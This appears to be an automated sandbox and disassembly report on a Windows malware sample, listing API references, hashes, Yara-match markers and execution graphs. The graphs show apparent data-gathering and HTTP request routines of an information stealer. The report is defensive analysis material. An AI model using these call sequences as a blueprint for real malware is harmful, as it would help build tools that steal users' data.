                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024BB32B,?,00000050,?,?,?,?,?), ref: 024BB1AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: d82f5f31afa3fae170ceda9a83c7987e31ea26b755ebb3535ab00374713e52e8
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: DB217F62A10105A6EB378F658D01BE772AAEF44BDDF4A8526ED09D7304E732D941C7B0
                                                      APIs
                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: EncodersGdipImage$Size
                                                      • String ID: image/png
                                                      • API String ID: 864223233-2966254431
                                                      • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                      • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                      • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                      • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: F(@
                                                      • API String ID: 1452528299-2698495834
                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                      APIs
                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ___std_exception_destroy
                                                      • String ID: F(@$ios_base::failbit set
                                                      • API String ID: 4194217158-1828034088
                                                      • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                      • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                      • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                      • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3886170330-2084237596
                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                      • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                      • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                      APIs
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                        • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                        • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                        • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                        • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                      • String ID: F@
                                                      • API String ID: 2118720939-885931407
                                                      • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                      • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                      • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                      • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                      APIs
                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                        • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                      Strings
                                                      • Access violation - no RTTI data!, xrefs: 00428D7A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                      • String ID: Access violation - no RTTI data!
                                                      • API String ID: 2053020834-2158758863
                                                      • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                      • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                      • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                      • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                      APIs
                                                      • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                      • String ID: zB$~B
                                                      • API String ID: 3275300208-395995950
                                                      • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                      • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                      • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                      • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pThreadProxy
                                                      • API String ID: 1687795959-3651400591
                                                      • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                      • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                      • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                      • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                      • GetLastError.KERNEL32 ref: 0042AF2E
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02482AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02482AAD,00000000), ref: 024AB187
                                                      • GetLastError.KERNEL32 ref: 024AB195
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02482AAD,00000000), ref: 024AB1F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction ID: bf93f079a537c6fe2134ac975e89092c4dfc72e2da7a6cff801ae4eda88185ba
                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction Fuzzy Hash: E9410732600246AFDB218F65CC687BF7BB5EF71758F14426BEC599B2A0DB308901CB60

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:7%
                                                      Signature Coverage:15.9%
                                                      Total number of Nodes:1533
                                                      Total number of Limit Nodes:37
                                                      execution_graph 34214 409e40 10 API calls 34179 9ec99f 17 API calls 34215 418240 12 API calls 34217 407641 free 34264 9f50bc 16 API calls 34180 422940 GetCurrentProcess IsWow64Process 34218 9f1e9d ExitProcess 34219 9e529d 290 API calls 34265 9ec39d 11 API calls 34267 9ecb99 strtok_s lstrcpy lstrcpy strtok_s 34220 9f0a91 1734 API calls 34221 408e50 strlen malloc strcpy_s free std::_Xinvalid_argument 34183 421550 lstrcpy lstrcpy lstrcpy lstrcpy 34138 9f0c88 614 API calls 34139 9f3487 7 API calls 34222 9f2a87 10 API calls 34223 9e81fc strtok_s StrCmpCA 34224 9f3687 6 API calls 34226 9e79aa 1167 API calls 34142 9ee480 133 API calls 34186 40b960 120 API calls 34269 9ec3bf 15 API calls 34270 417f60 7 API calls 34188 9e8fba lstrcpy strtok_s 34228 9e86b5 strtok_s strtok_s 34271 9e07b0 120 API calls 34229 9f8ab0 42 API calls __calloc_crt 33098 405570 GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 33099 4055d1 33098->33099 33100 405627 InternetCloseHandle InternetCloseHandle 33098->33100 33101 4055d8 InternetReadFile 33099->33101 33102 405623 33099->33102 33103 405600 KiUserExceptionDispatcher 33099->33103 33104 40563f 33100->33104 33101->33099 33101->33102 33102->33100 33103->33099 33103->33103 34143 40a070 12 API calls 34144 417c70 11 API calls 34273 9f0bad 1723 API calls 34189 9f99a8 167 API calls __setmbcp 34145 9f84a7 RtlUnwind 34231 9f32a7 GetSystemPowerStatus 34232 9e1ea7 166 API calls 34190 40897f RaiseException __CxxThrowException@8 32573 406000 32574 406020 32573->32574 32575 406035 32574->32575 32576 40602d lstrcpy 32574->32576 32718 404ae0 32575->32718 32576->32575 32578 406040 32579 40607c lstrcpy 32578->32579 32580 406088 32578->32580 32579->32580 32581 4060af lstrcpy 32580->32581 32582 4060bb 32580->32582 32581->32582 32583 4060df lstrcpy 32582->32583 32584 4060eb 32582->32584 32583->32584 32585 40611a lstrcpy 32584->32585 32586 406126 32584->32586 32585->32586 32587 406159 InternetOpenA StrCmpCA 32586->32587 32588 40614d lstrcpy 32586->32588 32589 40618d 32587->32589 32588->32587 32590 40619c 32589->32590 32591 40684e InternetCloseHandle CryptStringToBinaryA 32589->32591 32722 423e10 lstrcpy lstrcpy GetSystemTime 32590->32722 32593 40687e LocalAlloc 32591->32593 32618 40696e 32591->32618 32594 406895 CryptStringToBinaryA 32593->32594 32593->32618 32595 4068ad LocalFree 32594->32595 32596 4068bf lstrlenA 32594->32596 32595->32618 32597 4068d3 32596->32597 32599 4068f9 lstrlenA 32597->32599 32600 4068ed lstrcpy 32597->32600 32598 4061a7 32601 4061d0 lstrcpy lstrcatA 32598->32601 32602 4061e5 32598->32602 32604 406913 32599->32604 32600->32599 32601->32602 32603 406207 lstrcpy 32602->32603 32605 40620f 32602->32605 32603->32605 32606 406925 lstrcpy lstrcatA 32604->32606 32607 406938 32604->32607 32608 40621e lstrlenA 32605->32608 32606->32607 32609 406967 32607->32609 32611 40695f lstrcpy 32607->32611 32610 406236 32608->32610 32609->32618 32612 406242 lstrcpy lstrcatA 32610->32612 32613 406259 32610->32613 32611->32609 32612->32613 32614 406282 32613->32614 32615 40627a lstrcpy 32613->32615 32616 406289 lstrlenA 32614->32616 32615->32614 32617 40629f 32616->32617 32619 4062ab lstrcpy lstrcatA 32617->32619 32620 4062c2 32617->32620 32619->32620 32621 4062e3 lstrcpy 32620->32621 32622 4062ed 32620->32622 32621->32622 32623 406314 lstrcpy lstrcatA 32622->32623 32624 40632a 32622->32624 32623->32624 32625 406353 32624->32625 32626 40634b lstrcpy 32624->32626 32627 40635a lstrlenA 32625->32627 32626->32625 32628 406370 32627->32628 32629 40637c lstrcpy lstrcatA 32628->32629 32630 406393 32628->32630 32629->32630 32631 4063bb 32630->32631 32632 4063b3 lstrcpy 32630->32632 32633 4063c2 lstrlenA 32631->32633 32632->32631 32634 4063d8 32633->32634 32635 4063e2 lstrcpy lstrcatA 32634->32635 32636 4063f6 32634->32636 32635->32636 32637 40641c 32636->32637 32638 406414 lstrcpy 32636->32638 32639 406423 lstrlenA 32637->32639 32638->32637 32640 40643e 32639->32640 32641 40644f lstrcpy lstrcatA 32640->32641 32642 40645f 32640->32642 32641->32642 32643 40647d lstrcpy lstrcatA 32642->32643 32644 406490 32642->32644 32643->32644 32645 4064ae lstrcpy 32644->32645 32646 4064b6 32644->32646 32645->32646 32647 4064c4 InternetConnectA 32646->32647 32647->32591 32648 4064f3 HttpOpenRequestA 32647->32648 32649 406847 InternetCloseHandle 32648->32649 32650 40652e 32648->32650 32649->32591 32723 427340 lstrlenA lstrcpy lstrcatA 32650->32723 32652 40653e 32724 4272b0 lstrcpy 32652->32724 32654 406547 32725 4272f0 lstrcpy lstrcatA 32654->32725 32656 40655a 32726 4272b0 lstrcpy 32656->32726 32658 406563 32727 427340 lstrlenA lstrcpy lstrcatA 32658->32727 32660 406578 32728 4272b0 lstrcpy 32660->32728 32662 406581 32729 427340 lstrlenA lstrcpy lstrcatA 32662->32729 32664 406597 32730 4272b0 lstrcpy 32664->32730 32666 4065a0 32731 427340 lstrlenA lstrcpy lstrcatA 32666->32731 32668 4065b6 32732 4272b0 lstrcpy 32668->32732 32670 4065bf 32733 427340 lstrlenA lstrcpy lstrcatA 32670->32733 32672 4065d4 32734 4272b0 lstrcpy 32672->32734 32674 4065dd 32735 4272f0 lstrcpy lstrcatA 32674->32735 32676 4065f0 32736 4272b0 lstrcpy 32676->32736 32678 4065f9 32737 427340 lstrlenA lstrcpy lstrcatA 32678->32737 32680 40660e 32738 4272b0 lstrcpy 32680->32738 32682 406617 32739 427340 lstrlenA lstrcpy lstrcatA 32682->32739 32684 40662c 32740 4272b0 lstrcpy 32684->32740 32686 406635 32741 4272f0 lstrcpy lstrcatA 32686->32741 32688 406648 32742 4272b0 lstrcpy 32688->32742 32690 406651 32743 427340 lstrlenA lstrcpy lstrcatA 32690->32743 32692 406666 32744 4272b0 lstrcpy 32692->32744 32694 40666f 32745 427340 lstrlenA lstrcpy lstrcatA 32694->32745 32696 406685 32746 4272b0 lstrcpy 32696->32746 32698 40668e 32747 427340 lstrlenA lstrcpy lstrcatA 32698->32747 32700 4066a4 32748 4272b0 lstrcpy 32700->32748 32702 4066ad 32749 427340 lstrlenA lstrcpy lstrcatA 32702->32749 32704 4066c2 32750 4272b0 lstrcpy 32704->32750 32706 4066cb 32751 4272f0 lstrcpy lstrcatA 32706->32751 32708 4066e1 32752 4272b0 lstrcpy 32708->32752 32710 4066ea 32711 4066f2 12 API calls 32710->32711 32712 40683a InternetCloseHandle 32711->32712 32715 40678b 32711->32715 32712->32649 32713 40679b lstrlenA 32713->32715 32714 4067cc lstrcpy lstrcatA 32714->32715 32715->32712 32715->32713 32715->32714 32716 406809 lstrcpy 32715->32716 32717 406818 InternetReadFile 32715->32717 32716->32715 32717->32712 32717->32715 32719 404af0 32718->32719 32719->32719 32720 404af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 32719->32720 32721 404b61 32720->32721 32721->32578 32722->32598 32723->32652 32724->32654 32725->32656 32726->32658 32727->32660 32728->32662 32729->32664 32730->32666 32731->32668 32732->32670 32733->32672 32734->32674 32735->32676 32736->32678 32737->32680 32738->32682 32739->32684 32740->32686 32741->32688 32742->32690 32743->32692 32744->32694 32745->32696 32746->32698 32747->32700 32748->32702 32749->32704 32750->32706 32751->32708 32752->32710 32962 418d00 StrCmpCA 32963 418d26 ExitProcess 32962->32963 32964 418d2d strtok_s 32962->32964 32965 418f42 32964->32965 32980 418d4c 32964->32980 32966 418f23 strtok_s 32966->32965 32966->32980 32967 418de4 StrCmpCA 32967->32966 32967->32980 32968 418e04 StrCmpCA 32968->32966 32969 418d66 lstrlenA 32969->32980 32970 418ee8 lstrlenA 32970->32980 32971 418ecf StrCmpCA 32971->32966 32971->32980 32972 418d90 lstrlenA 32972->32980 32973 418eb6 StrCmpCA 32973->32966 32973->32980 32974 418dba lstrlenA 32974->32980 32975 418e1d StrCmpCA 32975->32966 32975->32980 32976 418e3d StrCmpCA 32976->32966 32976->32980 32977 418e5d StrCmpCA 32977->32966 32977->32980 32978 418e7d StrCmpCA 32978->32966 32978->32980 32979 418e9d StrCmpCA 32979->32966 32979->32980 32980->32966 32980->32967 32980->32968 32980->32969 32980->32970 32980->32971 32980->32972 32980->32973 32980->32974 32980->32975 32980->32976 32980->32977 32980->32978 32980->32979 32981 418f1b lstrcpy 32980->32981 32981->32966 32982 41f300 lstrlenA 32983 41f33e 32982->32983 32984 41f352 lstrlenA 32983->32984 32985 41f346 lstrcpy 32983->32985 32986 41f363 32984->32986 32985->32984 32987 41f377 lstrlenA 32986->32987 32988 41f36b lstrcpy 32986->32988 32989 41f388 32987->32989 32988->32987 32990 41f390 lstrcpy 32989->32990 32991 41f39c 32989->32991 32990->32991 32992 41f3b8 lstrcpy 32991->32992 32993 41f3c4 32991->32993 32992->32993 32994 41f3e6 lstrcpy 32993->32994 32995 41f3f2 32993->32995 32994->32995 32996 41f41c lstrcpy 32995->32996 32997 41f428 32995->32997 32996->32997 32998 41f44e lstrcpy 32997->32998 33043 41f460 32997->33043 32998->33043 32999 41f46c lstrlenA 32999->33043 33000 41f626 lstrcpy 33000->33043 33001 41f504 lstrcpy 33001->33043 33002 41f656 lstrcpy 33064 41f65e 33002->33064 33003 41f529 lstrcpy 33003->33043 33004 401410 8 API calls 33004->33064 33005 41efe0 28 API calls 33005->33043 33006 41f100 36 API calls 33006->33064 33007 41f5e0 lstrcpy 33007->33043 33008 41f70d lstrcpy 33008->33064 33009 41f88a StrCmpCA 33015 420061 33009->33015 33009->33043 33010 41f788 StrCmpCA 33010->33009 33010->33064 33011 41fbcb StrCmpCA 33021 41fff8 33011->33021 33011->33043 33012 41f8ba lstrlenA 33012->33043 33013 41ff0b StrCmpCA 33019 41ff1f Sleep 33013->33019 33028 41ff35 33013->33028 33014 420083 lstrlenA 33025 42009f 33014->33025 33015->33014 33016 42007b lstrcpy 33015->33016 33016->33014 33017 41f7be lstrcpy 33017->33064 33018 41fbfb lstrlenA 33018->33043 33019->33043 33020 42001a lstrlenA 33029 420036 33020->33029 33021->33020 33022 420012 lstrcpy 33021->33022 33022->33020 33023 41fa26 lstrcpy 33023->33043 33024 4200c0 lstrlenA 33041 4200dc 33024->33041 33025->33024 33030 4200b8 lstrcpy 33025->33030 33026 41f8ed lstrcpy 33026->33043 33027 41ff57 lstrlenA 33035 41ff73 33027->33035 33028->33027 33031 41ff4f lstrcpy 33028->33031 33034 41ff94 lstrlenA 33029->33034 33038 42004f lstrcpy 33029->33038 33030->33024 33031->33027 33032 41fd66 lstrcpy 33032->33043 33033 41fc2e lstrcpy 33033->33043 33045 41ffb0 33034->33045 33035->33034 33050 41ff8c lstrcpy 33035->33050 33036 41f910 lstrcpy 33036->33043 33037 401410 8 API calls 33037->33043 33038->33034 33040 41fa56 lstrcpy 33040->33064 33042 4200fd 33041->33042 33046 4200f5 lstrcpy 33041->33046 33047 401510 4 API calls 33042->33047 33043->32999 33043->33000 33043->33001 33043->33002 33043->33003 33043->33005 33043->33007 33043->33009 33043->33011 33043->33012 33043->33013 33043->33018 33043->33023 33043->33026 33043->33032 33043->33033 33043->33036 33043->33037 33043->33040 33044 41fd96 lstrcpy 33043->33044 33049 41fc51 lstrcpy 33043->33049 33054 41f964 lstrcpy 33043->33054 33057 41fca5 lstrcpy 33043->33057 33043->33064 33044->33064 33051 41ffd1 33045->33051 33052 41ffc9 lstrcpy 33045->33052 33046->33042 33066 41ffdd 33047->33066 33048 41f812 lstrcpy 33048->33064 33049->33043 33050->33034 33067 401510 33051->33067 33052->33051 33054->33043 33055 41fab5 lstrcpy 33055->33064 33056 41fb30 StrCmpCA 33056->33011 33056->33064 33057->33043 33058 41fdf5 lstrcpy 33058->33064 33059 41fe70 StrCmpCA 33059->33013 33059->33064 33060 41fb63 lstrcpy 33060->33064 33061 41fea3 lstrcpy 33061->33064 33062 41efe0 28 API calls 33062->33064 33063 41fbb7 lstrcpy 33063->33064 33064->33004 33064->33006 33064->33008 33064->33010 33064->33011 33064->33013 33064->33017 33064->33043 33064->33048 33064->33055 33064->33056 33064->33058 33064->33059 33064->33060 33064->33061 33064->33062 33064->33063 33065 41fef7 lstrcpy 33064->33065 33065->33064 33068 40151f 33067->33068 33069 40152b lstrcpy 33068->33069 33070 401533 33068->33070 33069->33070 33071 40154d lstrcpy 33070->33071 33072 401555 33070->33072 33071->33072 33073 40156f lstrcpy 33072->33073 33075 401577 33072->33075 33073->33075 33074 401599 33074->33066 33075->33074 33076 401591 lstrcpy 33075->33076 33076->33074 34234 425a00 12 API calls 34235 9f2ed7 GetUserDefaultLocaleName LocalAlloc CharToOemW 34276 9ee3d0 140 API calls 34237 406a10 16 API calls 34277 407b10 170 API calls 33956 426710 33957 426b2e 8 API calls 33956->33957 33958 42671d 43 API calls 33956->33958 33959 426bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33957->33959 33960 426c38 33957->33960 33958->33957 33959->33960 33961 426d02 33960->33961 33962 426c45 8 API calls 33960->33962 33963 426d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33961->33963 33964 426d7f 33961->33964 33962->33961 33963->33964 33965 426e19 33964->33965 33966 426d8c 6 API calls 33964->33966 33967 426f40 33965->33967 33968 426e26 12 API calls 33965->33968 33966->33965 33969 426f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33967->33969 33970 426fbd 33967->33970 33968->33967 33969->33970 33971 426ff1 33970->33971 33972 426fc6 GetProcAddress GetProcAddress 33970->33972 33973 427025 33971->33973 33974 426ffa GetProcAddress GetProcAddress 33971->33974 33972->33971 33975 427032 10 API calls 33973->33975 33976 42711d 33973->33976 33974->33973 33975->33976 33977 427182 33976->33977 33978 427126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33976->33978 33979 42718b GetProcAddress 33977->33979 33980 42719e 33977->33980 33978->33977 33979->33980 33981 427203 33980->33981 33982 4271a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33980->33982 33982->33981 34193 9f35c7 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 34238 9f3ec7 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 34152 9ecc4e StrCmpCA StrCmpCA StrCmpCA strtok_s 34194 9f99c5 41 API calls __amsg_exit 34279 9ec7c0 ShellExecuteEx 33077 422820 GetProcessHeap HeapAlloc 33084 4228b0 GetProcessHeap HeapAlloc RegOpenKeyExA 33077->33084 33079 422849 33080 422850 33079->33080 33081 42285a RegOpenKeyExA 33079->33081 33082 422892 RegCloseKey 33081->33082 33083 42287b RegQueryValueExA 33081->33083 33083->33082 33085 4228f5 RegQueryValueExA 33084->33085 33086 42290b RegCloseKey 33084->33086 33085->33086 33087 422920 33086->33087 33087->33079 33087->33087 34153 424020 SHGetFolderPathA lstrcpy 34282 9f33f7 GetSystemInfo wsprintfA 34239 9f0af0 1732 API calls 33742 41ef30 33743 41ef50 33742->33743 33744 41ef68 33743->33744 33746 41ef60 lstrcpy 33743->33746 33750 401410 33744->33750 33746->33744 33749 41ef7e 33751 401510 4 API calls 33750->33751 33752 40141b 33751->33752 33753 401435 lstrcpy 33752->33753 33754 40143d 33752->33754 33753->33754 33755 401457 lstrcpy 33754->33755 33756 40145f 33754->33756 33755->33756 33757 401479 lstrcpy 33756->33757 33759 401481 33756->33759 33757->33759 33758 4014e5 33761 4056c0 33758->33761 33759->33758 33760 4014dd lstrcpy 33759->33760 33760->33758 33762 4056e0 33761->33762 33763 4056f5 33762->33763 33764 4056ed 